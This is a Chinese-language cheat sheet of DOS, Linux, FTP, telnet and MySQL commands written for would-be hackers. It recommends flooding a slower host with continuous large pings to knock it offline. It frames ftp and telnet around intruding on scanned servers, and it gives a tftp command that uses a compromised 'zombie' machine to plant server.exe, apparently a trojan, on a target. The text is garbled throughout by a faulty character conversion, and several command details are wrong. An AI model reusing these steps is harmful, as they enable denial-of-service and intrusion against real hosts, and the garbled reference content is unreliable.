win+R。运行该快捷方式。下面3一个人必须知道:
ping 它是用来检查网络是否通畅或者网络连接速度的命令。
作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这种:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包。对方就要返回一个相同大小的数据包。依据返回的数据包我们能够确定目标主机的存在,能够初步推断目标主机的操作系统等。
以下就来看看它的一些经常使用的操作。先看看帮助吧,在DOS窗体中键入:ping /? 回车。。所看到的的帮助画面。在此,我们仅仅掌握一些主要的非常实用的參数就能够了(下同)。 -t 表示将不间断向目标IP发送数据包。直到我们强迫其停止。试想,假设你使用100M的宽带接入,而目标IP是56K的小猫,那么要不了多久。目标IP就由于承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。 -l 定义发送数据包的大小,默觉得32字节,我们利用它能够最大定义到65500字节。结合上面介绍的-t參数一起使用,会有更好的效果哦。 -n 定义向目标IP发送数据包的次数。默觉得3次。假设网络速度比較慢,3次对我们来说也浪费了不少时间。由于如今我们的目的不过推断目标IP是否存在,那么就定义为一次吧。
说明一下,假设-t 參数和 -n參数一起使用。ping命令就以放在后面的參数为标准。比方"ping IP -t -n 3",尽管使用了-t參数。但并非一直ping下去,而是仅仅ping 3次。另外,ping命令不一定非得ping IP,也能够直接ping主机域名,这样就能够得到主机的IP。 以下我们举个样例来说明一下详细使用方法。
这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒。从这里能够推断网络连接速度的大小 。从TTL的返回值能够初步推断被ping主机的操作系统,之所以说"初步推断"是由于这个值是能够改动的。
这里TTL=32表示操作系统可能是win98。 (小知识:假设TTL=128,则表示目标主机可能是Win2000;假设TTL=250,则目标主机可能是Unix) 至于利用ping命令能够高速查找局域网故障,能够高速搜索最快的QQserver。能够对别人进行ping攻击……这些就靠大家自己发挥了。
ftp 大家对这个命令应该比較熟悉了吧?网络上开放的ftp的主机非常多,当中非常大一部分是匿名的。也就是说不论什么人都能够登陆上去。如今假设你扫到了一台开放ftp服务的主机(一般都是开了21port的机器),假设你还不会使用ftp的命令怎么办?以下就给出主要的ftp命令用法。
首先在命令行键入ftp回车,出现ftp的提示符,这时候能够键入"help"来查看帮助(不论什么DOS命令都能够使用此方法查看其帮助)。 大家可能看到了,这么多命令该怎么用?事实上也用不到那么多,掌握几个主要的就够了。 首先是登陆过程。这就要用到open了。直接在ftp的提示符下输入"open 主机IP ftpport"回车就可以,一般port默认都是21,能够不写。
接着就是输入合法的username和password进行登陆了,这里以匿名ftp为例介绍。 username和password都是ftp,password是不显示的。当提示**** logged in时,就说明登陆成功。这里由于是匿名登陆,所以用户显示为Anonymous。
接下来就要介绍详细命令的用法了。 dir 跟DOS命令一样,用于查看server的文件,直接敲上dir回车。就能够看到此ftpserver上的文件。 cd 进入某个目录。
get 下载文件到本地机器。
put 上传文件到远程server。这就要看远程ftpserver是否给了你可写的权限了,假设能够,呵呵,该怎么 利用就不多说了,大家就自由发挥去吧。 delete 删除远程ftpserver上的文件。这也必须保证你有可写的权限。 bye 退出当前连接。 quit 同上。
telnet 功能强大的远程登陆命令。差点儿全部的入侵者都喜欢用它。屡试不爽。为什么?它操作简单。如同使用自己的机器一样。仅仅要你熟悉DOS命令,在成功以administrator身份连接了远程机器后。就能够用它来干你想干的一切了。以下介绍一下用法。首先键入telnet回车,再键入help查看其帮助信息。
然后在提示符下键入open IP回车,这时就出现了登陆窗体。让你输入合法的username和password,这里输入不论什么password都是不显示的。
当输入username和password都正确后就成功建立了telnet连接。这时候你就在远程主机上具有了和此用户一样的权限,利用DOS命令就能够实现你想干的事情了。这里我使用的超级管理员权限登陆的。
其它的还有:
shutdown-------60秒倒计时关机命令
notepad--------打开记事本
calc-----------启动计算器
taskmgr-----任务管理器(2000/xp/2003)
write----------写字板
mspaint--------绘图板
mstsc----------远程桌面连接
cmd.exe--------CMD命令提示符
netstat -a 查看开启了哪些port,经常使用netstat -an
netstat -n 查看port的网络连接情况。经常使用netstat -an
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,參数:“-l[空格]数据包大小”。“-n发送数据次数”。“-t”指一直ping。
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址。ipconfig可用參数“/all”显示所有配置信息
telnet ip port 远和登陆server,默认port为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名称1 路径文件名称2 /y 拷贝文件1到指定的文件夹为文件2,用參数/y就同一时候取消确认你要改写一份现存文件夹文件
xcopy 要复制的文件或文件夹树 目标地址文件夹名 拷贝文件和文件夹树。用參数/Y将不提示覆盖同样文件
用參数/e才可连文件夹下的子文件夹一起拷贝到目标地址下。
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe 登陆后,将“IP”的server.exe下载到目标主机c:server.exe 參数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以 ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
ftp ip port 用于上传文件至server或进行文件操作。默认port为21。
bin指用二进制方式传送(可运行文件进)。默觉得ASCII格式传送(文本文件时)
dir 查看文件,參数:/Q显示文件及文件夹属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被訪问时间,/T:W上次被改动时间
date /t 、 time /t 使用此參数即“DATE/T”、“TIME/T”将仅仅显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 环境变量设置
set 显示当前全部的环境变量
set p(或其他字符) 显示出当前以字符p(或其他字符)开头的全部环境变量
echo 信息 在屏幕上显示出信息
find 文件名称 查找某文件
title 标题名字 更改CMD窗体标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky )
md 文件夹名 创建文件夹
replace 源文件 要替换文件的文件夹 替换文件
tree 以树形结构显示出文件夹,用參数-f 将列出第个文件夹中文件名
type 文件名称 显示文本文件的内容
more 文件名称 逐屏显示输出文件
taskmgr 调出任务管理器
- win2003系统下新增命令(有用部份):
參数说明:/S 关闭主机,/R 重新启动主机, /T 数字 设定延时的时间。范围0~180秒之间, /A取消开机。/M //IP 指定的远程主机。 例:shutdown /r /t 0 马上重新启动本地主机(无延时)
tasklist 显示当前执行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
參数说明:/M 列出当前进程载入的dll文件。/SVC 显示出每一个进程相应的服务,无參数时就仅仅列出当前的进程。
- Linux系统下基本命令 注:要区分大写和小写
dir 显示当前文件夹文件,ls -al 显示包含隐藏文件(同win2K的 dir)
pwd 查询当前所在的文件夹位置
cd cd ..回到上一层文件夹。注意cd 与..之间有空格。
cd /返回到根文件夹。
cat 文件名称 查看文件内容
cat >abc.txt 往abc.txt文件里写上内容。
more 文件名称 以一页一页的方式显示一个文本文件。
cp 拷贝文件
mv 移动文件
rm 文件名称 删除文件,rm -a 文件夹名删除文件夹及子文件夹
mkdir 文件夹名 建立文件夹
rmdir 删除子文件夹。文件夹内没有文档。
chmod 设定档案或文件夹的存取权限
grep 在档案中查找字符串
diff 档案文件比較
find 档案搜寻
date 如今的日期、时间
who 查询眼下和你使用同一台机器的人以及Login时间地点
w 查询眼下上机者的具体资料
whoami 查看自己的帐号名称
groups 查看某人的Group
passwd 更改password
history 查看自己下过的命令
ps 显示进程状态
kill 停止某进程
gcc 黑客通经常使用它来编译C语言写的文件
su 权限转换为指定使用者
telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。
ftp ftp连接上某server(同win2K)
- FTP命令
以下我具体的整理了一份FTP命令,前16个最为经常使用。
FTP的命令行格式为:
ftp -v -d -i -n -g [主机名] ,当中
-v 显示远程server的全部响应信息
-n 限制ftp的自己主动登录。即不使用。.n etrc文件;
-d 使用调试方式;
-g 取消全局文件名称。
- FTP使用的内部命令例如以下(中括号表示可选项):
01.cd remote-dir:进入远程主机文件夹。
02.cdup:进入远程主机文件夹的父文件夹。
03.pwd:显示远程主机的当前工作文件夹。
04.lcd[dir]:将本地工作文件夹切换至dir。
05.dir[remote-dir][local-file]:显示远程主机文件夹。并将结果存入本地文件。
06.ls[remote-dir][local-file]:显示远程文件夹remote-dir, 并存入本地文件local-file。
07.delete remote-file:删除远程主机文件。
08.get remote-file[local-file](下载):将远程主机的文件remote-file传至本地硬盘的local-file。
09.put local-file[remote-file](上传):将本地文件local-file传送至远程主机。
10.mget remote-files:传输多个远程文件。
11.mput local-file:将多个文件传输至远程主机。
12.prompt:设置多个文件传输时的交互提示。
13.bin:使用二进制文件传输方式。
14.close:中断与远程server的ftp会话(与open相应)。
15.quit:同bye。退出ftp会话。
- 其它的还包含:
.$ macro-ame[args]: 运行宏定义macro-name。
account[password]: 提供登录远程系统成功后訪问系统资源所需的补充口令。
append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名称,则使用本地文件名称。
ascii:使用ascii类型传输方式。
bell:每一个命令运行完成后计算机响铃一次。
case:在使用mget时。将远程主机文件名称中的大写转为小写字母。
chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。
cr:使用asscii方式传输文件时,将回车换行转换为回行。
debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。
disconnection:同close。
form format:将文件传输方式设置为format,缺省为file方式。
glob:设置mdelete,mget,mput的文件名称扩展。缺省时不扩展文件名称。同命令行的-g參数。
hash:每传输1024字节,显示一个hash符号(#)。
help[cmd]:显示ftp内部命令cmd的帮助信息。如:help get。
idle[seconds]:将远程server的休眠计时器设为[seconds]秒。
image:设置二进制传输方式(同binary)。
macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。
mdelete[remote-file]:删除远程主机文件。
mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile 。
mkdir dir-name:在远程主机中建一文件夹。
mls remote-file local-file:同nlist,但可指定多个文件名称。
mode[modename]:将文件传输方式设置为modename, 缺省为stream方式。
modtime file-name:显示远程主机文件的最后改动时间。
newer file-name: 假设远程机中file-name的改动时间比本地硬盘同名文件的时间更近,则重传该文件。
nlist[remote-dir][local-file]:显示远程主机文件夹的文件清单,并存入本地硬盘的local-file。
nmap[inpattern outpattern]:设置文件名称映射机制, 使得文件传输时,文件里的某些字符相互转换。 如:nmap $1.$2.$3[$1。$2].[$2,$3],则传输文件a1.a2.a3时,文件名称变为a1。a2。 该命令特别适用于远程主机为非UNIX机的情况。
ntrans[inchars[outchars]]:设置文件名称字符的翻译机制,如ntrans1R,则文件名称LLL将变为RRR。
open host[port]:建立指定ftpserver连接。可指定连接端口。
passive:进入被动传输方式。
proxy ftp-cmd:在次要控制连接中,运行一条ftp命令, 该命令同意连接两个ftpserver,以在两个server间传输文件。
第一条ftp命令必须为open。以首先建立两个server间的连接。
quote arg1,arg2...:将參数逐字发至远程ftpserver,如:quote syst.
recv remote-file[local-file]:同get。
reget remote-file[local-file]:类似于get, 但若local-file存在,则从上次传输中断处续传。
rhelp[cmd-name]:请求获得远程主机的帮助。
rstatus[file-name]:若未指定文件名称,则显示远程主机的状态, 否则显示文件状态。
rename[from][to]:更改远程主机文件名称。
reset:清除回答队列。
restart marker:从指定的标志marker处。又一次開始get或put,如:restart 130。
rmdir dir-name:删除远程主机文件夹。
runique:设置文件名称仅仅一性存储,若文件存在,则在原文件后加后缀.1, .2等。
send local-file[remote-file]:同put。
sendport:设置PORT命令的使用。
site arg1,arg2...:将參数作为SITE命令逐字发送至远程ftp主机。
size file-name:显示远程主机文件大小,如:site idle 7200。
status:显示当前ftp状态。
struct[struct-name]:将文件传输结构设置为struct-name, 缺省时使用stream结构。
sunique:将远程主机文件名称存储设置为仅仅一(与runique相应)。
system:显示远程主机的操作系统类型。
tenex:将文件传输类型设置为TENEX机的所需的类型。
tick:设置传输时的字节计数器。
trace:设置包跟踪。
type[type-name]:设置文件传输类型为type-name,缺省为ascii。如:type binary,设置二进制传输方式。
umask[newmask]:将远程server的缺省umask设置为newmask。如:umask 3
user user-name[password][account]:向远程主机表明自己的身份。须要口令时,必须输入口令。如:user anonymous my@email。
verbose:同命令行的-v參数,即设置详尽报告方式。ftp server的全部响 应都将显示给用户。缺省为on.
- MYSQL命令
首先要想使用mysql的命令。必须将mysql的bin文件夹加入到path变量里面去。我个人比較喜欢使用wamp这套集成mysql的集成工具。这个工具非常方便非常好使用的,并且也自带着命令窗体的。我加入C:wampinmysqlmysql5.6.17in了到path里面去,这样子就能够在CMD窗体里面使用mysql命令了。
连接MYSQL有2种方式(假设刚安装好MYSQL。超级用户root是没有password的,普通情况下使用自己电脑里面的mysql。直接敲mysql即可):
1,mysql -h 主机地址 -u username -p password;(例:mysql -h 127.0.0.1 -u root -p)
2,mysql -p password -u username -h 主机地址。(例:mysql -p -u root -h 127.0.0.1)
(注意:u与root能够不用加空格,其他也一样)
退出MYSQL非常easy:exit 或者 quit
以下这些就是经常使用的sql语句,以后会在整理数据库的时候做具体的介绍,这里不多赘述了。
mysqladmin -uusername -p旧password password 新password 改动password
show databases; 显示数据库列表。刚開始时才两个数据库:mysql和test。mysql库非常重要它里面有MYSQL的系统信息。我们改password和新增用户,实际上就是用这个库进行操作。
use mysql。
show tables; 显示库中的数据表
describe 表名; 显示数据表的结构
create database 库名; 建库
use 库名;
create table 表名 (现场设置列表); 建表
drop database 库名;
drop table 表名。 删除库和删除表
delete from 表名; 表中的空的记录
select * from 表名; 表中显示的记录